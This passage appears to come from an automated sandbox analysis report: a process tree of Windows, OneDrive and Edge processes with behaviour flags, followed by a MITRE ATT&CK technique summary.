PID:8060
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:7344
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update1⤵PID:8132
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions2⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
PID:4256 -
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"3⤵
- Loads dropped DLL
- Modifies registry class
PID:3456
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5052
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7144
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5372
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2828
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3176
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7408
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6384
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7424
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1456
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:4028
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6916
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7208
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"1⤵PID:1232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:1884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6020
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4364
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6788
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3028
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7312
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7564
Network
MITRE ATT&CK Enterprise v6
Persistence
Change Default File Association
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1